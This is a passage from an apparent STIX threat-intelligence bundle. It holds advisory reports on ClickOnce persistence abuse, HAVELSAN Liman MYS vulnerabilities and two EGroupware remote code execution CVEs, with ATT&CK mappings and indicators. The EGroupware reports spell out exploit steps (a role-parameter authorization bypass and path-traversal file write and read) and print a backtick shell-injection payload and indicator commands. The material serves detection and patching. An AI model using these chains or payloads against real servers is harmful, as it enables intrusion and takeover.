      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09ad8de9-481f-53b5-a5af-77222af580c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a7e82c39-3f6c-55d5-8025-78462277e87c",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a7e82c39-3f6c-55d5-8025-78462277e87c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 1",
      "description": "## Overview\n\nThis CrowdStrike brief, \"New Abuse of the ClickOnce Technology, Part 1,\" details Microsoft's ClickOnce application deployment technology. Designed to simplify software distribution, ClickOnce allows developers to publish applications that users can run and install with minimal interaction and without requiring administrative privileges. While intended for legitimate software distribution, these very features present a significant security concern: they can be exploited by threat actors to easily spread malware. This first part of the series provides an in-depth look into the technical aspects of ClickOnce, explaining how applications are published and deployed on user endpoints, and establishes the foundation for understanding its security implications. The subsequent Part 2 will delve into specific weaponization methods and provide detection strategies.\n\n## Attack Chain\n\n[The source document focuses on the legitimate functionality and inner workings of the ClickOnce technology, rather than detailing a specific attack chain or observed exploitation. Information regarding threat actor abuse and specific attack methodologies is explicitly reserved for Part 2 of this series.]\n\n## Impact\n\nThe inherent design of ClickOnce technology, which enables applications to be deployed and installed with minimal user interaction and no administrative privileges, significantly lowers the barrier for entry for malicious actors. If abused, this capability could allow for widespread, stealthy distribution of malware, bypassing typical security controls that rely on elevated privilege prompts or complex installation procedures. The lack of administrative privilege requirements means that even non-privileged users could inadvertently install malicious software, leading to system compromise, data theft, or further network penetration. The potential for simplified malware delivery poses a risk across all sectors leveraging Windows environments.\n\n## Recommendation\n\n*   Familiarize your security and development teams with the functionality and internal mechanisms of the ClickOnce technology discussed in this brief to better understand its potential attack surface.\n*   Review your organization's policies and controls regarding ClickOnce application usage and distribution, assessing any potential exposure introduced by its low-privilege deployment model.\n*   Anticipate and prepare for upcoming detection recommendations and threat intelligence that will be detailed in Part 2 of this series regarding the specific abuse of ClickOnce technology.\n",
      "published": "2026-07-07T14:58:48Z",
      "labels": [
        "windows",
        "application-deployment",
        "abuse-of-legitimate-features",
        "clickonce"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--501bb160-22c2-50f5-a5ea-505dad45344f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-11348: HAVELSAN Liman MYS Cryptographic Signature Bypass Vulnerability",
      "description": "## Overview\n\nA significant vulnerability, CVE-2026-11348, has been identified in HAVELSAN Inc.'s Liman MYS product. This flaw stems from an improper verification of cryptographic signatures, which an attacker can exploit to fake the origin of data. The vulnerability, first disclosed by the Computer Emergency Response Team of the Republic of Turkey, impacts all versions of Liman MYS released prior to `release.Master.1107`. While specific details of in-the-wild exploitation are not yet public, such a vulnerability allows malicious actors to potentially inject falsified information into systems or bypass authentication mechanisms that rely on cryptographic signatures. This could lead to data manipulation, unauthorized access, or other integrity compromises within environments utilizing Liman MYS.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Data**: An unauthenticated attacker creates data intended to be malicious (e.g., altered configuration, spoofed commands, or falsified reports).\n2.  **Attacker Forges Cryptographic Signature**: The attacker generates a cryptographic signature for the malicious data that appears legitimate but is actually forged.\n3.  **Attacker Submits Crafted Payload**: The attacker sends the malicious data bundle, including the forged signature, to a vulnerable HAVELSAN Liman MYS instance.\n4.  **Liman MYS Processes Incoming Data**: The application receives the data and attempts to validate its authenticity by verifying the accompanying cryptographic signature.\n5.  **Signature Verification Bypass (CVE-2026-11348)**: Due to the inherent flaw in the signature verification logic (CWE-347), Liman MYS fails to correctly identify the forged signature as invalid.\n6.  **Data Accepted as Legitimate**: The Liman MYS application mistakenly authenticates and accepts the malicious data as originating from a trusted or authorized source.\n7.  **Application Processes Faked Data**: The application proceeds to process the attacker-controlled data, believing it to be genuine and reliable.\n8.  **Impact Realized**: The faked data is then integrated into the system, leading to consequences such as data integrity compromise, execution of unauthorized commands, or other logical abuses depending on the attacker's specific objective.\n\n## Impact\n\nThis vulnerability allows an attacker to \"fake the source of data,\" meaning they can potentially inject arbitrary malicious information into the Liman MYS system, bypass integrity checks, or spoof legitimate entities. The CVSS v3.1 base score of 8.1 (High) indicates significant potential for impact, including high confidentiality, integrity, and availability impacts, if successfully exploited. Organizations using affected versions of HAVELSAN Liman MYS could face data corruption, unauthorized system behavior, or loss of trust in the data managed by the platform. Without immediate patching, affected systems remain vulnerable to external manipulation, potentially impacting operational reliability and security.\n\n## Recommendation\n\n*   Patch CVE-2026-11348 immediately by updating HAVELSAN Liman MYS to `release.Master.1107` or a newer version as advised by the vendor.\n*   Review the vendor advisory at https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0504 for further guidance and details on the patch.\n",
      "published": "2026-07-07T12:25:00Z",
      "labels": [
        "vulnerability",
        "cryptographic-vulnerability",
        "liman-mys"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11348"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0504"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c93d409d-5f89-526c-9290-7c66d4f67e5b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-13696: HAVELSAN Liman MYS LDAP Injection Vulnerability",
      "description": "## Overview\n\nA critical LDAP injection vulnerability, identified as CVE-2026-13696, has been discovered in HAVELSAN Inc.'s Liman MYS administrative management system. This flaw stems from improper neutralization of special characters within LDAP queries, allowing attackers to manipulate or inject malicious LDAP statements. Such an injection could lead to unauthorized authentication bypass, data exfiltration from the LDAP directory, or alteration of user and group information. The vulnerability affects all versions of Liman MYS prior to `release.Master.1107`. With a CVSS v3.1 Base Score of 8.8, this vulnerability poses a significant risk, as successful exploitation could grant attackers extensive control over user management and potentially lead to broader system compromise. This issue was published on 2026-07-07, and organizations using affected versions are urged to apply the patch immediately to mitigate these severe risks.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-13696 could allow an unauthenticated attacker to bypass authentication mechanisms, gain unauthorized access to the Liman MYS system, and potentially the underlying LDAP directory. This could lead to information disclosure, unauthorized modification of user accounts, groups, and permissions, or even full administrative compromise of the directory service. The highly sensitive nature of LDAP directories means that compromise could have widespread effects on user management, access control across multiple integrated systems, and lead to significant data breaches or operational disruption.\n\n## Recommendation\n\n*   Patch CVE-2026-13696 on all HAVELSAN Inc. Liman MYS instances immediately by upgrading to `release.Master.1107` or later.\n",
      "published": "2026-07-07T12:25:36Z",
      "labels": [
        "vulnerability",
        "ldap-injection",
        "web-application"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13696"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d22ff7e-9217-5080-9d31-c6095a78fd17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad983742-8d80-5d31-91ac-c7f213808143",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3678386e-0b24-5590-a612-2d5c455641fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51744449-cf04-5530-840b-0aa668d54077",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aee2e78d-34e8-56e6-bb58-b8ea60be8bb5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--626ad017-4d3e-5861-bd89-f380c74c892c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology: Persistence via .appref-ms Files",
      "description": "## Overview\n\nThreat actors are actively leveraging Microsoft's ClickOnce technology for malicious purposes, exploiting its design to achieve stealthy initial access, execution, and persistence. This abuse capitalizes on the minimal user interaction required for ClickOnce deployments, often bypassing traditional security defenses like email filters by using `.application` files. Attackers benefit from the general lack of awareness surrounding ClickOnce, as users may unknowingly install malicious applications by clicking seemingly innocuous web buttons. A key advantage for adversaries is that ClickOnce applications do not require elevated privileges for deployment, allowing them to target standard user accounts. Furthermore, the built-in updating mechanism can be weaponized; once an application is installed, threat actors can push malicious updates to maintain remote access and adapt their command and control (C2) infrastructure without further user prompts. Malicious payloads execute within legitimate Microsoft process trees, such as `dfsvc.exe` and `rundll32.exe`, increasing stealth and evading detection.\n\n## Attack Chain\n\n1.  **Initial Access**: A user is lured by a phishing email or malicious website to click a link or download a `.application` file that initiates a ClickOnce deployment.\n2.  **Execution**: The user interaction triggers the ClickOnce deployment process, which launches `dfsvc.exe` to manage the application installation and updates.\n3.  **Payload Delivery**: `dfsvc.exe` then executes `rundll32.exe` to download and run the initial malicious payload from an attacker-controlled deployment server.\n4.  **Persistence Establishment**: A shortcut file (`.appref-ms`) for the malicious ClickOnce application is dropped into the user's Start Menu programs folder (e.g., `%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`).\n5.  **Automated Persistence**: For more robust persistence, the `.appref-ms` file is placed directly into a Windows Startup folder or configured for automatic execution via a scheduled task.\n6.  **Update Mechanism Abuse**: Upon subsequent launches (either manual or automated via persistence), the ClickOnce application contacts the attacker's deployment server for updates.\n7.  **Command and Control**: The attacker pushes new, malicious components or command-and-control instructions as an update, which are then downloaded and executed by `dfsvc.exe` and `rundll32.exe` without user authorization.\n8.  **Impact**: The attacker gains reliable remote access, maintains persistence, and can modify or extend their malicious activities on the compromised system.\n\n## Impact\n\nSuccessful exploitation of ClickOnce technology by threat actors can lead to widespread malware execution and persistent unauthorized access within an organization's network. Attackers can bypass traditional security controls, compromise standard user accounts without requiring administrative privileges, and maintain a covert presence through legitimate-looking Microsoft processes and built-in update mechanisms. This results in the loss of data confidentiality, integrity, and availability, and can be used for further lateral movement, data exfiltration, or deployment of ransomware, significantly impacting business operations and reputation. The stealthy nature of these attacks makes them challenging to detect and eradicate, potentially leading to long-term compromise.\n\n## Recommendation\n\n*   Deploy the Sigma rule detecting suspicious `.appref-ms` file creation in startup folders to your SIEM and tune for your environment.\n*   Implement application whitelisting solutions to restrict the execution of unsigned or untrusted ClickOnce applications.\n*   Enable Sysmon file event logging (Event ID 11 for FileCreate) to detect the creation of `.appref-ms` files in sensitive directories like startup folders.\n*   Train users to identify and report suspicious links or `.application` file downloads that may lead to ClickOnce abuse.\n",
      "published": "2026-07-07T12:44:22Z",
      "labels": [
        "clickonce",
        "persistence",
        "initial-access",
        "malware",
        "windows",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--650e990d-13d2-5cb6-aa0f-f13cf2c13b7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f812ddde-e1cd-5584-ba3f-4a7ef15be1b8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0880df2-cf3d-5a00-845a-e53d7ef18bf6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f812ddde-e1cd-5584-ba3f-4a7ef15be1b8",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81dba846-5b2b-5d85-8b5d-df05e7531ed9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f812ddde-e1cd-5584-ba3f-4a7ef15be1b8",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c331a84-5dc7-575b-b33b-279e5ccfede0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f812ddde-e1cd-5584-ba3f-4a7ef15be1b8",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f812ddde-e1cd-5584-ba3f-4a7ef15be1b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "EGroupware Critical RCE Vulnerability (CVE-2026-27823)",
      "description": "## Overview\n\nA critical remote code execution (RCE) vulnerability, tracked as CVE-2026-27823, has been discovered in EGroupware, an open-source collaboration suite. This flaw allows an authenticated attacker to execute arbitrary code on the underlying server. In environments where user self-registration is enabled, the vulnerability can be exploited by an unauthenticated attacker, significantly broadening its impact. Discovered by Huong Kieu of Cenobe Security, the vulnerability stems from a chain of weaknesses: an improper authorization check in the `SmallPartMediaRecorder::ajax_upload()` function, which can be bypassed via crafted request data, an arbitrary file write due to path traversal, and a separate arbitrary file read vulnerability in `importexport_export_ui::download`. By combining these, attackers can overwrite critical PHP files, inject malicious code, and achieve full system compromise. The vulnerability affects `composer/egroupware/egroupware` versions prior to `23.1.20260224` and versions `26.0.20251208` through `26.1.20260223`.\n\n## Attack Chain\n\n1.  **Initial Access / Authentication Bypass**: An attacker, potentially unauthenticated if self-registration is enabled, crafts a POST request to `/egroupware/json.php` targeting the `SmallPartMediaRecorder::ajax_upload()` function.\n2.  **Authorization Bypass**: The crafted request includes a manipulated JSON body with `participant_role` set to `3` (ROLE_TEACHER), bypassing the `isTeacher` check intended to restrict file uploads.\n3.  **Arbitrary File Write**: Following the authorization bypass, the attacker exploits a path traversal vulnerability via the `video_type` parameter to write an arbitrary file to a controlled path, such as `./header.inc.php`.\n4.  **Arbitrary File Read**: A separate vulnerability is exploited by making a GET request to `/egroupware/index.php?menuaction=importexport.importexport_export_ui.download` with a malicious `_filename` parameter (e.g., `../../../usr/share/egroupware/header.inc.php`) to read the original content of the target file.\n5.  **Code Injection Preparation**: The attacker combines the original `header.inc.php` content with injected PHP code (e.g., a webshell or administrative credential modification logic) to preserve file validity and ensure continued server operation.\n6.  **Remote Code Execution**: The attacker overwrites `header.inc.php` using the arbitrary file write vulnerability with the crafted content, leading to Remote Code Execution when the file is subsequently loaded by the web server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-27823 leads to critical consequences, including full system compromise and complete takeover of the EGroupware instance. Attackers can gain arbitrary remote code execution on the server, allowing them to install backdoors, exfiltrate sensitive data, manipulate or destroy data, or pivot to other systems within the network. This could result in significant data breaches, operational disruption, and reputational damage for affected organizations. The ability to modify administrative setup passwords further enables persistent control over the EGroupware application.\n\n## Recommendation\n\n*   **Patch CVE-2026-27823 immediately**: Upgrade EGroupware `composer/egroupware/egroupware` to version `23.1.20260224` or `26.2.20260224` to mitigate CVE-2026-27823.\n*   **Disable user self-registration**: If not strictly necessary, disable user self-registration in EGroupware to reduce the attack surface for unauthenticated exploitation of CVE-2026-27823.\n*   **Deploy the Sigma rules in this brief**: Integrate the provided Sigma rules into your SIEM to detect attempts at exploiting the authorization bypass, arbitrary file write, and arbitrary file read components of CVE-2026-27823.\n*   **Enable webserver logging**: Ensure comprehensive logging for your EGroupware web server (access logs, error logs) to capture HTTP requests including method, URI, query parameters, and POST body details, which are critical for activating the detection rules.\n",
      "published": "2026-07-07T13:12:53Z",
      "labels": [
        "RCE",
        "web-vulnerability",
        "egroupware",
        "php",
        "critical",
        "exploit"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-h9qx-v5xp-ph8p"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e94ea01c-8ef0-52d2-bcc9-658258472495",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filepath: /tmp/pwned_egw",
      "pattern": "[x-ti-bot:filepath = '/tmp/pwned_egw']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:14:06Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b6a06685-e4cb-507a-90eb-ac2a36f72671",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "target_ref": "indicator--e94ea01c-8ef0-52d2-bcc9-658258472495"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--63018d57-4ade-5db7-8a81-e29b214ef2e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command: touch /tmp/pwned_egw 2\u003e/dev/null",
      "pattern": "[x-ti-bot:command = 'touch /tmp/pwned_egw 2\u003e/dev/null']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:14:06Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bdd89777-0434-5475-8741-721af6ba8d84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "target_ref": "indicator--63018d57-4ade-5db7-8a81-e29b214ef2e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--86a01eff-a10c-51ff-bb6a-b21dd0fbeca3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "command: id \u003e /tmp/pwned_egw",
      "pattern": "[x-ti-bot:command = 'id \u003e /tmp/pwned_egw']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:14:06Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd4e0628-6ff1-56a7-bff4-c0e1b1aa6c08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "target_ref": "indicator--86a01eff-a10c-51ff-bb6a-b21dd0fbeca3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1a6f5cdd-d0cb-5818-b644-4a417298e0df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a100ecec-9924-5bf1-a095-7751b18b3987",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6f1a9526-9ca5-505d-a3a2-b44e991ea51d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "EGroupware Authenticated RCE via Malicious eTemplate Upload (CVE-2026-40187)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-40187, has been identified in EGroupware, allowing an authenticated administrator to achieve OS-level Remote Code Execution (RCE). The flaw resides in the `Widget::expand_name()` method within `api/src/Etemplate/Widget.php`, which passes template widget attribute values into a PHP `eval()` call. Crucially, while double quotes are escaped, backtick characters are not. In PHP, backticks inside a double-quoted `eval()` string trigger shell command execution. This means a malicious eTemplate XML file (`.xet`) uploaded by an administrator can leverage this oversight to execute arbitrary commands on the host server. The vulnerability affects EGroupware versions \u003e= 26.0.20251208 but \u003c 26.0.20260113, and versions \u003c 23.1.20260601. A mitigating factor exists in official Docker deployments, which typically set `disable_functions` in `php.ini` to block `shell_exec()`, but non-Docker or misconfigured installations are fully vulnerable.\n\n## Attack Chain\n\n1.  An attacker gains authenticated administrative access to an EGroupware instance.\n2.  The attacker navigates to the Admin -\u003e Filemanager -\u003e VFS Mounts section within EGroupware and clicks \"Install custom templates\" to mount the `/etemplates` directory with administrative write access.\n3.  The attacker crafts a malicious `index.xet` XML file that contains a payload, such as `\u003ctextbox id=\"$row\\`touch /tmp/pwned_egw 2\u003e/dev/null\\`\"/\u003e`, embedding a shell command (`touch /tmp/pwned_egw`) within a widget ID attribute.\n4.  The attacker uploads this malicious `index.xet` file to a specific path within the mounted VFS, typically `/etemplates/admin/templates/default/index.xet`, using the EGroupware file manager.\n5.  To trigger the vulnerability, the attacker then navigates to an EGroupware admin panel URL, such as `https://\u003ctarget\u003e/egroupware/index.php?menuaction=admin.admin_ui.index`, which causes the application to load and process the custom template.\n6.  During template processing, the `Widget::expand_name()` method is invoked, and the specially crafted widget ID containing the backtick shell command is passed to a PHP `eval()` call.\n7.  Due to the unescaped backticks, the PHP interpreter executes the embedded shell command (`touch /tmp/pwned_egw 2\u003e/dev/null`) on the underlying Linux operating system.\n8.  The shell command runs with the privileges of the web server user (e.g., `www-data`), creating or modifying files on the server and achieving RCE.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-40187 allows an attacker with administrative EGroupware credentials to elevate their privileges to arbitrary OS command execution as the web server user. From this position, an attacker can access sensitive system files (e.g., database credentials), establish persistence mechanisms, pivot to other internal systems, or completely compromise the EGroupware server and its data. The vulnerability directly affects any EGroupware installation that is not using the official Docker deployment with its hardened `php.ini` settings or has had `disable_functions` modified. While no specific victim count is provided, all non-hardened EGroupware instances are at risk.\n\n## Recommendation\n\n*   Prioritize patching EGroupware installations to a version that addresses CVE-2026-40187 immediately.\n*   Ensure that PHP's `disable_functions` directive in `php.ini` is properly configured to block functions like `exec`, `passthru`, `shell_exec`, `system`, `proc_open`, and `popen` on all EGroupware servers, especially non-Docker deployments.\n*   Deploy the provided Sigma rule to detect suspicious process creation activities indicating potential exploitation of CVE-2026-40187.\n*   Enable comprehensive `process_creation` logging on all Linux servers hosting EGroupware to capture command line arguments, parent processes, and user information, which is critical for the Sigma rule.\n*   Block the execution of the commands identified in the IOCs (e.g., `touch /tmp/pwned_egw`, `id \u003e /tmp/pwned_egw`) at endpoint protection layers where possible.\n",
      "published": "2026-07-07T13:14:06Z",
